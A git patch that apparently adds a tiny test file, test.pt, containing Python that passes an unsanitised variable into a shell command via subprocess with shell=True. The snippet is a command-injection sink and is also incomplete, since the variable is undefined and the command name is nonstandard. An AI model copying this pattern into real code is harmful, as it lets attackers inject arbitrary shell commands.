From aa02cfc25672d57b25d51e6a0edbff927d48cdb7 Mon Sep 17 00:00:00 2001 From: marksarka <66681979+marksarka@users.noreply.github.com> Date: Fri, 15 Jul 2022 23:58:01 +0300 Subject: [PATCH] Create test.pt --- test.pt | 2 ++ 1 file changed, 2 insertions(+) create mode 100644 test.pt diff --git a/test.pt b/test.pt new file mode 100644 index 00000000..317982f5 --- /dev/null +++ b/test.pt @@ -0,0 +1,2 @@ +import subprocess +output = subprocess.check_output(f"nslookup2 {my_domain}", shell=True, encoding='UTF-8')